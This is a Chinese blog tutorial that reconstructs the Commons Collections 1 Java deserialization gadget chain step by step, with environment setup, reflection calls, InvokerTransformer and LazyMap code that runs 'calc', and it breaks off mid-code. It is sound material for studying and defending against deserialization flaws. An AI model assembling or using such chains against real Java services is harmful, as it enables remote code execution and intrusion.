<!DOCTYPE html><html lang="zh"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="所有人的第一条cc链"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><link rel="canonical" href="https://osthing.github.io/blog/commonscollections-1%E9%93%BE"><link rel="alternate" type="application/rss+xml" title="oSthing's blog" href="/rss.xml"><meta name="generator" content="Astro v5.18.2"><title>CommonsCollections_1链 — oSthing&#39;s blog</title><meta property="og:type" content="website"><meta property="og:title" content="CommonsCollections_1链 — oSthing's blog"><meta property="og:description" content="所有人的第一条cc链"><meta property="og:url" content="https://osthing.github.io/blog/commonscollections-1%E9%93%BE"><meta property="og:image" content="https://osthing.github.io/og-default.png"><meta property="og:site_name" content="oSthing's blog"><meta property="og:locale" content="zh-CN"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="CommonsCollections_1链 — oSthing's blog"><meta name="twitter:description" content="所有人的第一条cc链"><meta name="twitter:image" content="https://osthing.github.io/og-default.png"><link rel="preconnect" href="https://rsms.me/"><link rel="stylesheet" href="https://rsms.me/inter/inter.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/JetBrains/JetBrainsMono@v2.304/web/css/jetbrains-mono.css"><link rel="stylesheet" href="/_astro/_slug_.AMwGTgR1.css"></head> <body class="min-h-screen flex flex-col bg-bg-light dark:bg-bg-dark text-fg-light dark:text-fg-dark antialiased"> <script>
  (function () {
    try {
      const stored = localStorage.getItem('theme');
      const prefersDark = window.matchMedia('(prefers-color-scheme: dark)').matches;
      const theme = stored ?? (prefersDark ? 'dark' : 'light');
      if (theme === 'dark') {
        document.documentElement.classList.add('dark');
      }
    } catch (_) {
      /* no-op */
    }
  })();
</script> <header class="border-b border-border-light dark:border-border-dark sticky top-0 z-30 bg-bg-light/80 dark:bg-bg-dark/80 backdrop-blur"> <div class="mx-auto flex w-full max-w-6xl items-center justify-between px-6 py-4"> <a href="/" class="flex items-center gap-2 font-mono text-sm font-medium tracking-tight"> <span class="inline-flex h-2 w-2 rounded-full bg-accent-light dark:bg-accent-dark"></span> <span>osthing&#39;s blog</span> </a> <nav class="hidden md:flex items-center gap-1 text-sm"> <a href="/" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> home </a><a href="/blog" class="rounded-md px-3 py-1.5 transition-colors text-fg-light dark:text-fg-dark"> blog </a><a href="/projects" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> projects </a><a href="/links" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> links </a><a href="/about" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> about </a><a href="/contact" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> contact </a> </nav> <div class="flex items-center gap-2 text-sm text-muted-light dark:text-muted-dark"> <a href="https://github.com/oSthing" rel="noopener noreferrer" target="_blank" class="rounded-md px-2 py-1 hover:text-fg-light dark:hover:text-fg-dark"> GitHub </a><a href="/rss.xml" rel="noopener noreferrer" class="rounded-md px-2 py-1 hover:text-fg-light dark:hover:text-fg-dark"> RSS </a> <button id="theme-toggle" type="button" aria-label="Toggle theme" class="rounded-md p-2 text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark transition-colors"> <svg class="hidden dark:block h-4 w-4" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2"></path> <path d="M12 20v2"></path> <path d="m4.93 4.93 1.41 1.41"></path> <path d="m17.66 17.66 1.41 1.41"></path> <path d="M2 12h2"></path> <path d="M20 12h2"></path> <path d="m6.34 17.66-1.41 1.41"></path> <path d="m19.07 4.93-1.41 1.41"></path> </svg> <svg class="block dark:hidden h-4 w-4" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M12 3a6 6 0 0 0 9 9 9 9 0 1 1-9-9Z"></path> </svg> </button> <script type="module">const e=document.getElementById("theme-toggle");e?.addEventListener("click",()=>{const t=document.documentElement.classList.toggle("dark");try{localStorage.setItem("theme",t?"dark":"light")}catch{}});</script> </div> </div>  </header> <main class="flex-1 w-full">  <article class="mx-auto w-full max-w-5xl px-6 py-16"> <header class="mb-12 border-b border-border-light dark:border-border-dark pb-8"> <div class="mb-3 flex items-center gap-2 text-sm text-muted-light dark:text-muted-dark"> <time datetime="2024-08-20T00:00:00.000Z">2024年8月20日</time> <span aria-hidden="true">·</span> <span>5 min read</span> </div> <h1 class="text-4xl font-semibold tracking-tight md:text-5xl">CommonsCollections_1链</h1> <p class="mt-4 text-lg text-muted-light dark:text-muted-dark">所有人的第一条cc链</p> <div class="mt-4 flex flex-wrap gap-2"> <span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> ctf </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> web </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> java_sec </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> 代码审计 </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> 反序列化 </span> </div> </header> <div class="grid gap-12 md:grid-cols-[minmax(0,1fr)_240px]"> <div class="prose prose-neutral dark:prose-invert max-w-none">  <h1 id="commonscollections-1链">CommonsCollections-1链</h1>
<p>有了urldns的链子我们大概就有思路怎么找了，那么urldns只是供我们测试是否能进行反序列化的话，我们还需要有一条能供我们rce的链子</p>
<p>cc这个库的作用不用我特别说了，总之就是一个很常用的工具类</p>
<p>那么首先cc1链的环境要求比较苛刻，这里简单讲一下</p>
<h2 id="环境配置">环境配置</h2>
<p>java版本：jdk 8u65</p>
<p>maven：3.6.3</p>
<p>cc版本：3.2.1</p>
<p>首先是java版本的下载，在<a href="https://www.oracle.com/java/technologies/downloads/">https://www.oracle.com/java/technologies/downloads/</a>
记得一定要把语言改成英文再下， 8u65会下成8u71</p>
<p>然后是源码包，不下源码包的话你看进去的变量会变成var1 var2这种解析后的代码</p>
<p>源码包下载地址：<a href="https://hg.openjdk.org/jdk8u/jdk8u/jdk/rev/af660750b2f4">https://hg.openjdk.org/jdk8u/jdk8u/jdk/rev/af660750b2f4</a>
点左侧的zip下载
我们解压 jdk8u65 的 src.zip，解压完之后，我们把 openJDK 8u65 解压出来的 sun 文件夹拷贝进 jdk8u65 中，这样子就能把 .class 文件转换为 .java 文件了</p>
<p><img src="E:/notes/web/%E4%BB%8E0.5%E5%BC%80%E5%A7%8B%E7%9A%84java%E5%AE%89%E5%85%A8/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/img/cc1-1.png" alt=""></p>
<p>然后是cc的源码包</p>
<p>首先导入cc</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="xml"><code><span class="line"><span style="color:#ADBAC7">        &#x3C;</span><span style="color:#8DDB8C">dependency</span><span style="color:#ADBAC7">></span></span>
<span class="line"><span style="color:#ADBAC7">            &#x3C;</span><span style="color:#8DDB8C">groupId</span><span style="color:#ADBAC7">>commons-collections&#x3C;/</span><span style="color:#8DDB8C">groupId</span><span style="color:#ADBAC7">></span></span>
<span class="line"><span style="color:#ADBAC7">            &#x3C;</span><span style="color:#8DDB8C">artifactId</span><span style="color:#ADBAC7">>commons-collections&#x3C;/</span><span style="color:#8DDB8C">artifactId</span><span style="color:#ADBAC7">></span></span>
<span class="line"><span style="color:#ADBAC7">            &#x3C;</span><span style="color:#8DDB8C">version</span><span style="color:#ADBAC7">>3.2.1&#x3C;/</span><span style="color:#8DDB8C">version</span><span style="color:#ADBAC7">></span></span>
<span class="line"><span style="color:#ADBAC7">        &#x3C;/</span><span style="color:#8DDB8C">dependency</span><span style="color:#ADBAC7">></span></span></code></pre>
<p>然后下载源码包</p>
<p><img src="E:/notes/web/%E4%BB%8E0.5%E5%BC%80%E5%A7%8B%E7%9A%84java%E5%AE%89%E5%85%A8/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/img/cc1-2.png" alt=""></p>
<p>环境配置完成，正式开始审cc链了</p>
<h2 id="runtimeexec">Runtime.exec</h2>
<p>首先我们要先了解一下java是怎么命令执行的</p>
<p>现在我们需要了解的是<code>runtime.exec</code></p>
<p>最基础的方法是这样</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.io.IOException;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException {</span></span>
<span class="line"><span style="color:#ADBAC7">        Runtime.</span><span style="color:#DCBDFB">getRuntime</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">exec</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>此外，我们还要了解反射调用执行</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {</span></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#ADBAC7"> c</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Class.</span><span style="color:#DCBDFB">forName</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"java.lang.Runtime"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        Method</span><span style="color:#ADBAC7"> m</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">c.</span><span style="color:#DCBDFB">getMethod</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"getRuntime"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        c.</span><span style="color:#DCBDFB">getMethod</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, String.class).</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(m.</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(c),</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p><code>Class.forName</code>来获取类</p>
<p><code>getMethod</code>来获取类的方法</p>
<p><code>invoke</code> 的作用是执行方法，它的第一个参数是：</p>
<ul>
<li>如果这个方法是一个普通方法，那么第一个参数是类对象</li>
<li>如果这个方法是一个静态方法，那么第一个参数是类</li>
</ul>
<p>这也比较好理解了，我们正常执行方法是 <code>[1].method([2], [3], [4]...)</code> ，其实在反射里就是
<code>method.invoke([1], [2], [3], [4]...)</code></p>
<h2 id="invokertransformertransform">InvokerTransformer.transform()</h2>
<p>我们直接来看yso的链子</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#768390">/*</span></span>
<span class="line"><span style="color:#768390">	Gadget chain:</span></span>
<span class="line"><span style="color:#768390">		ObjectInputStream.readObject()</span></span>
<span class="line"><span style="color:#768390">			AnnotationInvocationHandler.readObject()</span></span>
<span class="line"><span style="color:#768390">				Map(Proxy).entrySet()</span></span>
<span class="line"><span style="color:#768390">					AnnotationInvocationHandler.invoke()</span></span>
<span class="line"><span style="color:#768390">						LazyMap.get()</span></span>
<span class="line"><span style="color:#768390">							ChainedTransformer.transform()</span></span>
<span class="line"><span style="color:#768390">								ConstantTransformer.transform()</span></span>
<span class="line"><span style="color:#768390">								InvokerTransformer.transform()</span></span>
<span class="line"><span style="color:#768390">									Method.invoke()</span></span>
<span class="line"><span style="color:#768390">										Class.getMethod()</span></span>
<span class="line"><span style="color:#768390">								InvokerTransformer.transform()</span></span>
<span class="line"><span style="color:#768390">									Method.invoke()</span></span>
<span class="line"><span style="color:#768390">										Runtime.getRuntime()</span></span>
<span class="line"><span style="color:#768390">								InvokerTransformer.transform()</span></span>
<span class="line"><span style="color:#768390">									Method.invoke()</span></span>
<span class="line"><span style="color:#768390">										Runtime.exec()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">	Requires:</span></span>
<span class="line"><span style="color:#768390">		commons-collections</span></span>
<span class="line"><span style="color:#768390"> */</span></span></code></pre>
<p>首先我们看到入口是<code>InvokerTransformer.transform()</code>我们跟进看</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">transform</span><span style="color:#ADBAC7">(Object input) {</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (input </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">;</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"><span style="color:#F47067">        try</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#ADBAC7">            Class</span><span style="color:#ADBAC7"> cls</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> input.</span><span style="color:#DCBDFB">getClass</span><span style="color:#ADBAC7">();	</span><span style="color:#768390">//反射加载类的地方</span></span>
<span class="line"><span style="color:#ADBAC7">            Method</span><span style="color:#ADBAC7"> method</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> cls.</span><span style="color:#DCBDFB">getMethod</span><span style="color:#ADBAC7">(iMethodName, iParamTypes);</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#ADBAC7"> method.</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(input, iArgs);</span></span>
<span class="line"><span style="color:#ADBAC7">                </span></span>
<span class="line"><span style="color:#ADBAC7">        } </span><span style="color:#F47067">catch</span><span style="color:#ADBAC7"> (NoSuchMethodException </span><span style="color:#F69D50">ex</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> FunctorException</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"InvokerTransformer: The method '"</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> iMethodName </span><span style="color:#F47067">+</span><span style="color:#96D0FF"> "' on '"</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> input.</span><span style="color:#DCBDFB">getClass</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">+</span><span style="color:#96D0FF"> "' does not exist"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        } </span><span style="color:#F47067">catch</span><span style="color:#ADBAC7"> (IllegalAccessException </span><span style="color:#F69D50">ex</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> FunctorException</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"InvokerTransformer: The method '"</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> iMethodName </span><span style="color:#F47067">+</span><span style="color:#96D0FF"> "' on '"</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> input.</span><span style="color:#DCBDFB">getClass</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">+</span><span style="color:#96D0FF"> "' cannot be accessed"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        } </span><span style="color:#F47067">catch</span><span style="color:#ADBAC7"> (InvocationTargetException </span><span style="color:#F69D50">ex</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> FunctorException</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"InvokerTransformer: The method '"</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> iMethodName </span><span style="color:#F47067">+</span><span style="color:#96D0FF"> "' on '"</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> input.</span><span style="color:#DCBDFB">getClass</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">+</span><span style="color:#96D0FF"> "' threw an exception"</span><span style="color:#ADBAC7">, ex);</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>我们一看就看到了反射类加载的地方，我们看一下各个参数是怎么控制的</p>
<p>首先cls是直接input传进来的，调用方法的时候直接runtime就行，<code>iMethodName</code>和<code>iParamTypes</code>还有<code>iArgs</code>都是构造的时候就传进去的</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(String methodName, </span><span style="color:#F47067">Class</span><span style="color:#ADBAC7">[] paramTypes, </span><span style="color:#F47067">Object</span><span style="color:#ADBAC7">[] args) {</span></span>
<span class="line"><span style="color:#6CB6FF">        super</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        iMethodName </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> methodName;</span></span>
<span class="line"><span style="color:#ADBAC7">        iParamTypes </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> paramTypes;</span></span>
<span class="line"><span style="color:#ADBAC7">        iArgs </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> args;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>我们先尝试用上面反射加载的方式加载，然后再把参传进去</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {</span></span>
<span class="line"><span style="color:#ADBAC7">        Runtime</span><span style="color:#ADBAC7"> runtime</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Runtime.</span><span style="color:#DCBDFB">getRuntime</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#ADBAC7"> cls</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">runtime.</span><span style="color:#DCBDFB">getClass</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        Method</span><span style="color:#ADBAC7"> method</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">cls.</span><span style="color:#DCBDFB">getMethod</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, String.class);</span></span>
<span class="line"><span style="color:#ADBAC7">        method.</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(runtime,</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>我们再尝试把这些参数传到<code>InvokerTransformer</code>里</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {</span></span>
<span class="line"><span style="color:#ADBAC7">        Runtime</span><span style="color:#ADBAC7"> runtime</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Runtime.</span><span style="color:#DCBDFB">getRuntime</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#768390">//        Class cls=runtime.getClass();</span></span>
<span class="line"><span style="color:#768390">//        Method method=cls.getMethod("exec", String.class);</span></span>
<span class="line"><span style="color:#768390">//        method.invoke(runtime,"calc");</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        InvokerTransformer</span><span style="color:#ADBAC7"> invokerTransformer</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> String</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">});</span></span>
<span class="line"><span style="color:#ADBAC7">        invokerTransformer.</span><span style="color:#DCBDFB">transform</span><span style="color:#ADBAC7">(runtime);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>成功执行，要注意构造函数里面要传的什么参数</p>
<p>那么我们成功构造好了链子的入口，接下来我们要看哪里有同名函数调用了<code>transform</code></p>
<h2 id="lazymapget">LazyMap.get()</h2>
<p>我们选中<code>transform</code>右键<code>find usages</code>来找到哪些地方调用了<code>transform()</code></p>
<p><img src="E:/notes/web/%E4%BB%8E0.5%E5%BC%80%E5%A7%8B%E7%9A%84java%E5%AE%89%E5%85%A8/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/img/cc1-3.png" alt=""></p>
<p>我们根据yso链子找到<code>LazyMap</code>，找到get方法调用了<code>transform()</code></p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">get</span><span style="color:#ADBAC7">(Object key) {</span></span>
<span class="line"><span style="color:#768390">        // create value for key if key is not currently in the map</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (map.</span><span style="color:#DCBDFB">containsKey</span><span style="color:#ADBAC7">(key) </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> false</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#ADBAC7">            Object</span><span style="color:#ADBAC7"> value</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> factory.</span><span style="color:#DCBDFB">transform</span><span style="color:#ADBAC7">(key);</span></span>
<span class="line"><span style="color:#ADBAC7">            map.</span><span style="color:#DCBDFB">put</span><span style="color:#ADBAC7">(key, value);</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#ADBAC7"> value;</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> map.</span><span style="color:#DCBDFB">get</span><span style="color:#ADBAC7">(key);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>当map里面没有这个key就会触发下面的内容</p>
<p>那么我们就要去找一下我们要用的<code>factory</code>是什么</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    protected</span><span style="color:#DCBDFB"> LazyMap</span><span style="color:#ADBAC7">(Map map, Transformer factory) {</span></span>
<span class="line"><span style="color:#6CB6FF">        super</span><span style="color:#ADBAC7">(map);</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (factory </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> IllegalArgumentException</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"Factory must not be null"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"><span style="color:#6CB6FF">        this</span><span style="color:#ADBAC7">.factory </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> factory;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>也是在构造的时候就能传到，但是这个类是<code>protected</code>不能直接构造得到，而这个类里的<code>decorate</code>方法能直接帮我们构造</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#ADBAC7"> Map </span><span style="color:#DCBDFB">decorate</span><span style="color:#ADBAC7">(Map map, Transformer factory) {</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> LazyMap</span><span style="color:#ADBAC7">(map, factory);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>尝试构造一下,因为是public方法，可以直接调用</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {</span></span>
<span class="line"><span style="color:#ADBAC7">        Runtime</span><span style="color:#ADBAC7"> runtime</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Runtime.</span><span style="color:#DCBDFB">getRuntime</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#768390">//        Class cls=runtime.getClass();</span></span>
<span class="line"><span style="color:#768390">//        Method method=cls.getMethod("exec", String.class);</span></span>
<span class="line"><span style="color:#768390">//        method.invoke(runtime,"calc");</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        InvokerTransformer</span><span style="color:#ADBAC7"> invokerTransformer</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> String</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">});</span></span>
<span class="line"><span style="color:#768390">//        invokerTransformer.transform(runtime);</span></span>
<span class="line"></span>
